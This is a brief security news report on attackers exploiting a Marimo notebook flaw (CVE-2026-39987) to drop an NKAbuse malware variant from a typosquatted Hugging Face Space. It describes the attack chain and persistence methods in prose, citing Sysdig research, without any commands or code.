Hackers are exploiting a critical vulnerability in Marimo reactive Python notebook to deploy a new variant of NKAbuse malware hosted on Hugging Face Spaces. Attacks leveraging the remote code execution flaw (CVE-2026-39987) started last week for credential theft, less than 10 hours after technical details were disclosed publicly, according to data from cloud-security company Sysdig. Sysdig researchers continued to monitor activity related to the security issue identified additional attacks, including a campaign that started on April 12 that abuses the Hugging Face Spaces platform for showcasing AI applications. Hugging Face serves as an AI development and machine learning-focused platform, acting as a hub for AI assets such as models, datasets, code, and tools, shared among the community. Hugging Face Spaces lets users deploy and share interactive web apps directly from a Git repository, typically for demos, tools, or experiments around AI. In the attacks that Sysdig observed, the attacker created a Space named vsccode-modetx (an intentional typosquat for VS Code) that hosts a dropper script (install-linux.sh) and a malware binary with the name kagent, also an attempt to mimic a legitimate Kubernetes AI agent tool. After exploiting the Marimo RCE, the threat actor ran a curl command to download the script from Hugging Face and execute it. Because Hugging Face Spaces is a legitimate HTTPS endpoint with a clean reputation, it is less likely to trigger alerts. The dropper script downloads the kagent binary, installs it locally, and sets up persistence via systemd, cron, or macOS LaunchAgent.